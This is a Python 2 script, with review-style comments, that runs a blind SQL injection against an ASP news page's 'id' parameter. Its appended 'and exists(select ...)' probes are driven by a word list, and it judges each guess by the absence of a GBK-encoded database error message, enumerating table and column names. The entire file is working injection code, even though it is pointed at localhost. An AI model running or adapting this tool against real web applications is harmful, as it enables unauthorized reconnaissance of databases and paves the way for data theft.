#coding:utf-8
import urllib2,re
# Page under test; Inject.payload() appends the probe text directly after the
# id value.
url = 'http://localhost/onews.asp?id=45'

# Error text searched for in each response (the literal means "database
# error"). Stored as written in this UTF-8 source file and converted to GBK
# where it is matched.
keywords = '数据库出错'

# Shared word list: filled by Inject.opendict(), read by Inject.inject().
L = list()
class Inject(object):
	"""Word-list check of table and column names behind the page at ``url``.

	Every entry of column.txt is tried first as a table name and, for each
	table that is accepted, again as a column name. A guess counts as accepted
	when the response does NOT contain the ``keywords`` error text.

	NOTE(review): each guess is a separate request whose query string carries
	``and exists(select``, so a run should be visible in the web server's
	access log as a series of such requests. The approach presumably relies on
	the page concatenating ``id`` into its SQL text; confirm against the
	application code.
	"""

	def opendict(self):
		"""Load column.txt into the module-level list ``L``, one entry per line."""
		with open(r'column.txt', 'r') as wordlist:
			# Only '\n' is stripped, so a '\r' from a CRLF file stays in the entry.
			L.extend(entry.strip('\n') for entry in wordlist.readlines())

	def payload(self, name):
		"""Request ``url`` with ``name`` appended and return the response body.

		``name`` is concatenated unchanged; the callers in this class pass text
		that already uses %20 for spaces. urllib2 errors are not caught here.
		"""
		response = urllib2.urlopen(urllib2.Request(url + name))
		body = response.read()
		response.close()
		return body

	def inject(self):
		"""Print every table/column pair from ``L`` that the page accepts."""
		# The error text is matched as GBK bytes, so the page is presumably
		# served in GBK -- confirm against the target.
		marker = keywords.decode('utf-8').encode('gbk')
		for table in L:
			# Start guessing table_name.
			table_probe = "%20and%20exists(select%20*%20from%20" + table + ")"
			if re.search(marker, self.payload(table_probe)):
				continue
			# table_name guessed; start guessing column_name with the same list.
			for column in L:
				column_probe = "%20and%20exists(select%20" + column + "%20from%20" + table + ")"
				if re.search(marker, self.payload(column_probe)):
					continue
				# column_name guessed.
				print "table:", table + "column:", column
if __name__ == '__main__':
	# Script entry point: load the word list, then run the table/column check.
	scanner = Inject()
	scanner.opendict()
	scanner.inject()
